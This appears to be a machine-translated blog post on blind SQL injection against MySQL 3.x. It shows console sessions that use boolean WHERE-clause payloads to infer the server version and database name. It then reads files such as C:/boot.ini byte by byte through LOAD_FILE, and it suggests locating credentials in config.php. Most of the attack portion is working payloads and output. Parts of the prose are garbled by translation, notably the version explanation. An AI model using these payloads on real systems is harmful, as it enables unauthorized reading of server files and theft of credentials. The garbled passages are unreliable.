A little thought about the injection of MySQL 3.0-vulnerability Research

3.0 injection of MySQL

The injection of MySQL is mainly by union query, but the union is only version 4. More than 0 of the useful, to 3. It's useless to be under 0 ...

So there's no way to use Union for cross table queries in MySQL 3.0 database, but you can use Load_file
But it is not possible to replace it directly with a union. Here's a little bit of my thinking:

Get version:
Mysql> SELECT * from user where userid=1 and length (version ()) <10;
Empty Set (0.00 sec)

Mysql> SELECT * from user where userid=1 and length (version ()) <1777;
+--------+----------+----------+
| UserID | Username | password |
+--------+----------+----------+
| 1 | Angel | Mypass |
+--------+----------+----------+
1 row in Set (0.00 sec)

Get the current database:
Mysql> SELECT * from user where userid=1 and length (Database ()) >0;
+--------+----------+----------+
| UserID | Username | password |
+--------+----------+----------+
| 1 | Angel | Mypass |
+--------+----------+----------+
1 row in Set (0.00 sec)

Seizure file Code:
Mysql> SELECT * from user where userid=1 and ASCII (Mid (Load_file (' C:/boot.ini '), 1,1) <1;
Empty Set (0.05 sec)

Mysql> SELECT * from user where userid=1 and ASCII (Mid (Load_file (' C:/boot.ini '), 1,1) >1;
+--------+----------+----------+
| UserID | Username | password |
+--------+----------+----------+
| 1 | Angel | Mypass |
+--------+----------+----------+
1 row in Set (0.00 sec)

Because of the heavy workload, you can use the program to achieve (but also very troublesome)
Another idea: You can use the character processing function to get "special character position", if we are config.php files we can choose "localhost" (or other) as a special character, first get the location (in which byte), in the vicinity of guessing it, so that can save a lot of work.